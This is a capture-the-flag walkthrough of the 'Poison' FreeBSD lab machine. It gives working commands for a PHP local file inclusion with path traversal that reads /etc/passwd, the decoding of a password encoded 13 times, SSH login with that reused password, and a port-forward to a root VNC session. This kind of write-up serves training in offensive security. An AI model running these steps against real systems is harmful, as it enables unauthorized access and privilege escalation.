Poison
A PHP application passes user-supplied filenames directly to include() with no validation, enabling LFI that leaks a 13x base64-encoded password — decoding it yields SSH credentials for charix, who holds a VNC password file granting a root graphical desktop session.
Overview
Poison is a medium-difficulty FreeBSD box built around two realistic misconfigurations. The web application uses PHP’s include() on an unsanitized file GET parameter, giving a path traversal primitive that reads pwdbackup.txt — a base64-encoded password stacked thirteen times. Decoding it yields SSH credentials for charix. In the home directory sits secret.zip, extractable with the same password; it contains an 8-byte VNC password file for an Xvnc session running as root on localhost. An SSH port-forward exposes port 5901 and vncviewer -passwd secret drops into a root desktop, completing the chain.
Machine Matrix
High Real-Life score reflects that unsanitized PHP includes and VNC running as root are both production misconfigurations; the slight CTF-like score comes from the 13-layer base64 encoding, which is contrived but the underlying vulnerability chain is authentic.
Recon
| Port | Service | Notes |
|---|---|---|
| 22 | SSH (OpenSSH) | FreeBSD; used for foothold and tunnel |
| 80 | HTTP (Apache) | PHP web app with filename include feature |
1
2
nmap -p- --min-rate=1000 -T4 -Pn 10.10.10.X
nmap -p22,80 -sC -sV -Pn 10.10.10.X
The scan reveals only two ports: SSH and a PHP-driven web app on 80. The web app’s homepage mentions a file viewer, which immediately flags the file parameter as an LFI candidate.
Enumeration
Browsing the web app shows a form that passes a file parameter to browse.php. Probing with listfiles.php (itself an included file that outputs a directory listing) reveals the full webroot contents — including pwdbackup.txt.
1
curl -s 'http://10.10.10.X/browse.php?file=listfiles.php'
The path traversal primitive confirms itself immediately:
1
curl -s 'http://10.10.10.X/browse.php?file=../../../../../etc/passwd'
/etc/passwd leaks cleanly — the user charix is visible. Next, fetch the credential file:
1
curl -s 'http://10.10.10.X/browse.php?file=pwdbackup.txt'
The file contains a base64 blob with a note that it has been encoded 13 times. Decode it in a single Python one-liner:
1
python3 -c "import base64; data=open('pwdbackup.txt').read().strip(); [data:=base64.b64decode(data).decode() for _ in range(13)]; print(data)"
Result: Charix!2#4%6&8(0
Foothold
With credentials in hand, SSH directly as charix:
1
sshpass -p 'Charix!2#4%6&8(0' ssh [email protected]
The login succeeds and lands a shell as charix.
User flag
1
cat /home/charix/user.txt # HTB{...}
Foothold as charix obtained and the user flag captured.
Privilege Escalation
On the box, check running processes and listening ports to identify escalation paths:
1
2
ps aux | grep -i vnc
netstat -an | grep LISTEN
Xvnc is running on 127.0.0.1:5901 as root. The home directory contains secret.zip; it opens with the same password used for SSH, a classic credential reuse pattern. Extract it on the attacker machine:
1
sshpass -p 'Charix!2#4%6&8(0' scp [email protected]:~/secret.zip ./
1
unzip -P 'Charix!2#4%6&8(0' secret.zip
Inspecting the extracted secret file shows an 8-byte binary — the VNC DES-encrypted password file format. Set up an SSH tunnel to forward the localhost-only VNC port:
1
sshpass -p 'Charix!2#4%6&8(0' ssh -L 5901:127.0.0.1:5901 -N -f [email protected]
Connect with vncviewer, pointing it at the password file:
1
vncviewer -passwd ./secret 127.0.0.1:5901
The VNC session opens a graphical desktop running as root. The escalation is purely a misconfiguration — CWE-250 (execution with unnecessary privileges) — not an exploit. Open a terminal in the desktop or read the flag directly from the VNC session.
Root flag
1
cat /root/root.txt # HTB{...}
Full compromise of Poison confirmed — root access obtained via a misconfigured VNC server running with unnecessary root privileges.